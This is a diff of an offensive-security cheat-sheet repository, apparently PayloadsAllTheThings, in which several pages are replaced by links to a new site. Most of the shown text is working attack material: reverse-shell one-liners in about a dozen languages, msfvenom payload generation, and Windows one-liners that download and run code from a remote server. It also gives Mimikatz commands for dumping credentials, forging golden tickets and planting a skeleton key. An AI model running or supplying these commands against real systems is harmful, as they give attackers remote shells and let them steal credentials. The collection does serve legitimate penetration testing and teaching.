[(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
 ```
 ### PHP
 ```bash
 php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
 ```
 ### Ruby
 ```ruby
 ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
 ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
 NOTE: Windows only
 ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
 ```
 ### Golang
 ```bash
 echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
 ```
 ### Netcat Traditional
 ```bash
 nc -e /bin/sh [IPADDR] [PORT]
 nc.traditional -e /bin/bash 10.0.0.1 4444
 ```
 ### Netcat OpenBsd
 ```bash
 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f
 ```
 ### Ncat
 ```bash
 ncat 127.0.0.1 4444 -e /bin/bash
 ncat --udp 127.0.0.1 4444 -e /bin/bash
 ```
 ### OpenSSL
 ```powershell
 hacker@kali$ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
 hacker@kali$ openssl s_server -quiet -key key.pem -cert cert.pem -port 4242
 or
 hacker@kali$ ncat --ssl -vv -l -p 4242
 user@company$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 127.0.0.1:4242 > /tmp/s; rm /tmp/s
 ```
 ### Powershell
 ```powershell
 powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
 ```
 ```powershell
 powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
 ```
 ```powershell
 powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')
 ```
 ### Awk
 ```powershell
 awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1>/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
 ```
 ### Java
 ```java
 r = Runtime.getRuntime()
 p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/4242;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
 p.waitFor()
 ```
 ### War
 ```java
 msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f war > reverse.war
 strings reverse.war | grep jsp # in order to get the name of the file
 ```
 ### Lua
 Linux only
 ```powershell
 lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','4242');os.execute('/bin/sh -i <&3 >&3 2>&3');"
 ```
 Windows and Linux
 ```powershell
 lua5.1 -e 'local host, port = "10.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
 ```
 ### NodeJS
 ```javascript
 (function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(4242, "10.0.0.1", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application form crashing
 })();
 or
 require('child_process').exec('nc -e /bin/sh 10.0.0.1 4242')
 or
 -var x = global.process.mainModule.require
 -x('child_process').exec('nc 10.0.0.1 4242 -e /bin/bash')
 or
 https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
 ```
 ### Groovy
 by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76)
 NOTE: Java reverse shell also work for Groovy
 ```javascript
 String host="localhost";
 int port=8044;
 String cmd="cmd.exe";
 Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
 ```
 ## Meterpreter Shell
 ### Windows Staged reverse TCP
 ```powershell
 $ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.110 LPORT=4242 -f exe > reverse.exe
 ```
 ### Windows Stageless reverse TCP
 ```powershell
 $ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.110 LPORT=4242 -f exe > reverse.exe
 ```
 ### Linux Staged reverse TCP
 ```powershell
 $ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.10.110 LPORT=4242 -f elf >reverse.elf
 ```
 ### Linux Stageless reverse TCP
 ```powershell
 $ msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.110 LPORT=4242 -f elf >reverse.elf
 ```
 ### Other platforms
 ```powershell
 $ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f elf > shell.elf
 $ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f exe > shell.exe
 $ msfvenom -p osx/x86/shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f macho > shell.macho
 $ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f asp > shell.asp
 $ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.jsp
 $ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f war > shell.war
 $ msfvenom -p cmd/unix/reverse_python LHOST="10.10.10.110" LPORT=4242 -f raw > shell.py
 $ msfvenom -p cmd/unix/reverse_bash LHOST="10.10.10.110" LPORT=4242 -f raw > shell.sh
 $ msfvenom -p cmd/unix/reverse_perl LHOST="10.10.10.110" LPORT=4242 -f raw > shell.pl
 $ msfvenom -p php/meterpreter_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.php; cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
 ```
 ## Spawn TTY Shell
 In order to catch a shell, you need to listen on the desired port. `rlwrap` will enhance the shell, allowing you to clear the screen with `[CTRL] + [L]`.
 ```powershell
 rlwrap nc localhost 80
 ```
 Sometimes, you want to access shortcuts, su, nano and autocomplete in a partially tty shell.
 :warning: OhMyZSH might break this trick, a simple `sh` is recommended
 > The main problem here is that zsh doesn't handle the stty command the same way bash or sh does. [...] stty raw -echo; fg[...] If you try to execute this as two separated commands, as soon as the prompt appear for you to execute the fg command, your -echo command already lost its effect
 ```powershell
 ctrl+z
 echo $TERM && tput lines && tput cols
 # for bash
 stty raw -echo
 fg
 # for zsh
 stty raw -echo; fg
 reset
 export SHELL=bash
 export TERM=xterm-256color
 stty rows <num> columns <cols>
 ```
 or use `socat` binary to get a fully tty reverse shell
 ```bash
 socat file:`tty`,raw,echo=0 tcp-listen:12345
 ```
 Spawn a TTY shell from an interpreter
 ```powershell
 /bin/sh -i
 python -c 'import pty; pty.spawn("/bin/sh")'
 perl -e 'exec "/bin/sh";'
 perl: exec "/bin/sh";
 ruby: exec "/bin/sh"
 lua: os.execute('/bin/sh')
 ```
 ## References
 * [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner)
 * [Pentest Monkey - Cheat Sheet Reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
 * [Spawning a TTY Shell](http://netsec.ws/?p=337)
 * [Obtaining a fully interactive shell](https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell)
--- a/Resources/Source
+++ b/Resources/Source
@@ -0,0 +1,9 @@
 # Source Code Management & CI/CD Compromise
 :warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/source-code-management-ci](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/source-code-management-ci/)
 * [Tools](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/source-code-management-ci/#tools)
 * [Enumerate repositories files and secrets](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/source-code-management-ci/#enumerate-repositories-files-and-secrets)
 * [Personal Access Token](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/source-code-management-ci/#personal-access-token)
 * [Gitlab CI/Github Actions](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/source-code-management-ci/#gitlab-cigithub-actions)
 * [References](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/source-code-management-ci/#references)
--- a/Resources/Subdomains
+++ b/Resources/Subdomains
@@ -1,6 +1,6 @@
 # Subdomains Enumeration
-## Summary
+:warning: Content of this page has been moved to [InternalAllTheThings/cloud/azure](https://github.com/swisskyrepo/InternalAllTheThings/)
 * [Enumerate all subdomains](#enumerate-all-subdomains-only-if-the-scope-is-domainext)
  * Subbrute
@@ -9,10 +9,12 @@
  * EyeWitness
  * Sublist3r
  * Subfinder
  * Findomain
  * Aquatone (Ruby and Go versions)
  * AltDNS
  * MassDNS
  * Nmap
  * Dnsdumpster
 * Subdomain take over
  * tko-subs
  * HostileSubBruteForcer
@@ -86,6 +88,17 @@ go get github.com/subfinder/subfinder
 ./Subfinder/subfinder -d example.com -o /tmp/results_subfinder.txt
 ```
 ### Using Findomain
 ```powershell
 $ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-linux
 $ chmod +x findomain-linux
 $ findomain_spyse_token="YourAccessToken"
 $ findomain_virustotal_token="YourAccessToken" 
 $ findomain_fb_token="YourAccessToken" 
 $ ./findomain-linux -t example.com -o
 ```
 ### Using Aquatone - old version (Ruby)
 ```powershell
@@ -151,6 +164,13 @@ cat /tmp/results_subfinder.txt | massdns -r $DNS_RESOLVERS -t A -o S -w /tmp/res
 nmap -sn --script hostmap-crtsh host_to_scan.tld
 ```
 ### Using dnsdumpster
 ```ps1
 git clone https://github.com/nmmapper/dnsdumpster
 python dnsdumpster.py -d domainname.com
 ```
 ## Subdomain take over
 Check [Can I take over xyz](https://github.com/EdOverflow/can-i-take-over-xyz) by EdOverflow for a list of services and how to claim (sub)domains with dangling DNS records.
@@ -166,7 +186,7 @@ go get github.com/anshumanbh/tko-subs
 ```bash
 git clone https://github.com/nahamsec/HostileSubBruteforcer
-chmox +x sub_brute.rb
+chmod +x sub_brute.rb
 ./sub_brute.rb
 ```
@@ -180,4 +200,4 @@ go get github.com/Ice3man543/SubOver
 ## References
 * [Subdomain Takeover: Proof Creation for Bug Bounties - Patrik Hudak](https://0xpatrik.com/takeover-proofs/)
-* [Subdomain Takeover: Basics - Patrik Hudak](https://0xpatrik.com/subdomain-takeover-basics/)
+* [Subdomain Takeover: Basics - Patrik Hudak](https://0xpatrik.com/subdomain-takeover-basics/)
--- a/Resources/Vulnerability
+++ b/Resources/Vulnerability
@@ -0,0 +1,9 @@
 # Vulnerability Reports
 :warning: Content of this page has been moved to [InternalAllTheThings/methodology/vulnerability-reports](https://swisskyrepo.github.io/InternalAllTheThings/methodology/vulnerability-reports/)
 * [Tools](https://swisskyrepo.github.io/InternalAllTheThings/methodology/vulnerability-reports/#tools)
 * [Vulnerability Report Structure](https://swisskyrepo.github.io/InternalAllTheThings/methodology/vulnerability-reports/#vulnerability-report-structure)
 * [Vulnerability Details Structure](https://swisskyrepo.github.io/InternalAllTheThings/methodology/vulnerability-reports/#vulnerability-details-structure)
 * [General Guidelines](https://swisskyrepo.github.io/InternalAllTheThings/methodology/vulnerability-reports/#general-guidelines)
 * [References](https://swisskyrepo.github.io/InternalAllTheThings/methodology/vulnerability-reports/#references)
--- a/Resources/Windows
+++ b/Resources/Windows
@@ -0,0 +1,21 @@
 # Windows - AMSI Bypass
 :warning: Content of this page has been moved to [InternalAllTheThings/redteam/evasion/windows-amsi-bypass](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/)
 * [List AMSI Providers](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#list-amsi-providers)
 * [Which Endpoint Protection is Using AMSI](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#which-endpoint-protection-is-using-amsi)
 * [Patching amsi.dll AmsiScanBuffer by rasta-mouse](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Patching-amsi.dll-AmsiScanBuffer-by-rasta-mouse)
 * [Dont use net webclient](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Dont-use-net-webclient)
 * [Amsi ScanBuffer Patch from -> https://www.contextis.com/de/blog/amsi-bypass](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Amsi-ScanBuffer-Patch)
 * [Forcing an error](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Forcing-an-error)
 * [Disable Script Logging](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Disable-Script-Logging)
 * [Amsi Buffer Patch - In memory](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Amsi-Buffer-Patch---In-memory)
 * [Same as 6 but integer Bytes instead of Base64](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Same-as-6-but-integer-Bytes-instead-of-Base64)
 * [Using Matt Graeber's Reflection method](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Using-Matt-Graebers-Reflection-method)
 * [Using Matt Graeber's Reflection method with WMF5 autologging bypass](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Using-Matt-Graebers-Reflection-method-with-WMF5-autologging-bypass)
 * [Using Matt Graeber's second Reflection method](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Using-Matt-Graebers-second-Reflection-method)
 * [Using Cornelis de Plaa's DLL hijack method](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Using-Cornelis-de-Plaas-DLL-hijack-method")
 * [Use Powershell Version 2 - No AMSI Support there](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Using-PowerShell-version-2)
 * [Nishang all in one](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Nishang-all-in-one)
 * [Adam Chesters Patch](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#Adam-Chester-Patch)
 * [AMSI.fail](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/#amsifail)
--- a/Resources/Windows
+++ b/Resources/Windows
@@ -0,0 +1,9 @@
 # Windows - DPAPI
 :warning: Content of this page has been moved to [InternalAllTheThings/redteam/evasion/windows-dpapi](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-dpapi/)
 * [List Credential Files](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-dpapi/#list-credential-files)
 * [DPAPI LocalMachine Context](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-dpapi/#dpapi-localmachine-context)
 * [Mimikatz - Credential Manager & DPAPI](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-dpapi/#mimikatz---credential-manager--dpapi)
 * [Hekatomb - Steal all credentials on domain](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-dpapi/#hekatomb---steal-all-credentials-on-domain)
 * [DonPAPI - Dumping DPAPI credz remotely](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-dpapi/#donpapi---dumping-dpapi-credz-remotely)
--- a/Resources/Windows
+++ b/Resources/Windows
@@ -0,0 +1,19 @@
 # Windows - Defenses
 :warning: Content of this page has been moved to [InternalAllTheThings/redteam/evasion/windows-defenses](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/)
 * [AppLocker](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#applocker)
 * [User Account Control](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#user-account-control)
 * [DPAPI](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#dpapi)
 * [Powershell](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#powershell)
    * [Anti Malware Scan Interface](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#anti-malware-scan-interface)
    * [Just Enough Administration](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#just-enough-administration)
    * [Contrained Language Mode](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#constrained-language-mode)
    * [Script Block Logging](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#script-block-logging)
 * [Protected Process Light](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#protected-process-light)
 * [Credential Guard](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#credential-guard)
 * [Event Tracing for Windows](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#event-tracing-for-windows)
 * [Windows Defender Antivirus](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#windows-defender-antivirus)
 * [Windows Defender Application Control](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#windows-defender-application-control)
 * [Windows Defender Firewall](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#windows-defender-firewall)
 * [Windows Information Protection](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/#windows-information-protection)
--- a/Resources/Windows
+++ b/Resources/Windows
@@ -1,106 +1,17 @@
 # Windows - Download and execute methods
-## Downloaded files location
+:warning: Content of this page has been moved to [InternalAllTheThings/redteam/access/windows-download-execute](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/)
- C:\Users\<username>\AppData\Local\Microsoft\Windows\Temporary Internet Files\
+* [Downloaded files location](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#downloaded-files-location)
- C:\Users\<username>\AppData\Local\Microsoft\Windows\INetCache\IE\<subdir>
+* [Powershell](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#powershell)
- C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV
+* [Cmd](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#cmd)
-
+* [Cscript / Wscript](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#cscript-wscript)
-## Powershell
+* [Mshta](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#mshta)
-
+* [Rundll32](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#rundll32)
-From an HTTP server
+* [Regasm / Regsvc](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#regasm-regsvc-subtee)
-
+* [Regsvr32](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#regsvr32)
-```powershell
+* [Odbcconf](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#odbcconf)
-powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"
+* [Msbuild](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#msbuild)
-```
+* [Certutil](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#certutil)
-
+* [Bitsadmin](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#bitsadmin)
-From a Webdav server
+* [References](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execute/#references)
 ```powershell
 powershell -exec bypass -f \\webdavserver\folder\payload.ps1
 ```
 ## Cmd
 ```powershell
 cmd.exe /k < \\webdavserver\folder\batchfile.txt
 ```
 ## Cscript / Wscript
 ```powershell
 cscript //E:jscript \\webdavserver\folder\payload.txt
 ```
 ## Mshta
 ```powershell
 mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
 ```
 ```powershell
 mshta http://webserver/payload.hta
 ```
 ```powershell
 mshta \\webdavserver\folder\payload.hta
 ```
 ## Rundll32
 ```powershell
 rundll32 \\webdavserver\folder\payload.dll,entrypoint
 ```
 ```powershell
 rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
 ```
 ## Regasm / Regsvc @subTee
 ```powershell
 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
 ```
 ## Regsvr32 @subTee
 ```powershell
 regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
 ```
 ```powershell
 regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
 ```
 ## Odbcconf
 ```powershell
 odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
 ```
 ## Msbuild
 ```powershell
 cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
 ```
 ## Certutil
 ```powershell
 certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
 ```
 ```powershell
 certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
 ```
 ## Bitsadmin
 ```powershell
 bitsadmin /transfer mydownloadjob /download /priority normal http://<attackerIP>/xyz.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe
 ```
 ## References
 - [arno0x0x - Windows oneliners to download remote payload and execute arbitrary code](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
--- a/Resources/Windows
+++ b/Resources/Windows
@@ -1,110 +1,20 @@
 # Windows - Mimikatz
-![Data in memory](http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png)
+:warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/mimikatz](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/)
-## Mimikatz - Execute commands
+* [Execute commands](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#execute-commands)
-
+* [Extract passwords](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#extract-passwords)
-Only one command
+* [LSA Protection Workaround](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#lsa-protection-workaround)
-
+* [Mini Dump](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#mini-dump)
-```powershell
+* [Pass The Hash](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#pass-the-hash)
-PS C:\temp\mimikatz> .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit
+* [Golden ticket](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#golden-ticket)
-```
+* [Skeleton key](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#skeleton-key)
-
+* [RDP Session Takeover](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#rdp-session-takeover)
-Mimikatz console (multiple commands)
+* [RDP Passwords](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#rdp-passwords)
-
+* [Credential Manager & DPAPI](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#credential-manager--dpapi)
-```powershell
+  * [Chrome Cookies & Credential](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#chrome-cookies--credential)
-PS C:\temp\mimikatz> .\mimikatz
+  * [Task Scheduled credentials](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#task-scheduled-credentials)
-mimikatz # privilege::debug
+  * [Vault](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#vault)
-mimikatz # sekurlsa::logonpasswords
+* [Commands list](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#commands-list)
-mimikatz # sekurlsa::wdigest
+* [Powershell version](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#powershell-version)
-```
+* [References](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/#references)
 ## Mimikatz - Extract passwords
 ```powershell
 mimikatz_command -f sekurlsa::logonPasswords full
 mimikatz_command -f sekurlsa::wdigest
 ```
 ## Mimikatz - Mini Dump
 Dump the lsass process.
 ```powershell
 C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
 net use Z: https://live.sysinternals.com
 Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
 ```
 Then load it inside Mimikatz.
 ```powershell
 mimikatz # sekurlsa::minidump lsass.dmp
 Switch to minidump
 mimikatz # sekurlsa::logonPasswords
 ```
 ## Mimikatz Golden ticket
 ```powershell
 .\mimikatz kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt
 ```
 ```powershell
 .\mimikatz "kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit
 ```
 ## Mimikatz Skeleton key
 ```powershell
 privilege::debug
 misc::skeleton
 # map the share
 net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz
 # login as someone
 rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab
 ```
 ## Mimikatz commands
 | Command |Definition|
 |:----------------:|:---------------|
 | CRYPTO::Certificates|list/export certificates|
 |CRYPTO::Certificates | list/export certificates|
 |KERBEROS::Golden | create golden/silver/trust tickets|
 |KERBEROS::List | list all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current user’s tickets.Similar to functionality of “klist”.|
 |KERBEROS::PTT | pass the ticket. Typically used to inject a stolen or forged Kerberos ticket (golden/silver/trust).|
 |LSADUMP::DCSync | ask a DC to synchronize an object (get password data for account). No need to run code on DC.|
 |LSADUMP::LSA | Ask LSA Server to retrieve SAM/AD enterprise (normal, patch on the fly or inject). Use to dump all Active Directory domain credentials from a Domain Controller or lsass.dmp dump file. Also used to get specific account credential such as krbtgt with the parameter /name: “/name:krbtgt”|
 |LSADUMP::SAM | get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts. This is used to dump all local credentials on a Windows computer.|
 |LSADUMP::Trust | Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly). Dumps trust keys (passwords) for all associated trusts (domain/forest).|
 |MISC::AddSid | Add to SIDHistory to user account. The first value is the target account and the second value is the account/group name(s) (or SID). Moved to SID:modify as of May 6th, 2016.|
 |MISC::MemSSP | Inject a malicious Windows SSP to log locally authenticated credentials.|
